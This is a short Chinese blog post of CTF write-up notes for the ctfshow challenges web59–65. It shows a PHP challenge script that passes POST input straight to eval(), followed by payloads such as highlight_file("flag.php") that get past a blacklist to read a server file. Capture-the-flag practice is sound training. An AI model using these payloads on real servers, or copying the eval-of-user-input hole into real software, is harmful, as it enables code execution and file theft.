web59-65笔记(后台⿊名单不断换)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这⾥是后台加了⿊名单,咱们不⽤上⾯的了,

换点其他的 POST: c=print_r(file("flag.php"));

 

web60 再换一个

POST: c=highlight_file("flag.php");

 

web61、web62、web63、web64、web65

同理POST

c=highlight_file("flag.php");

posted @ 2025-03-15 16:00  justdoIT*  阅读(6)  评论(0)    收藏  举报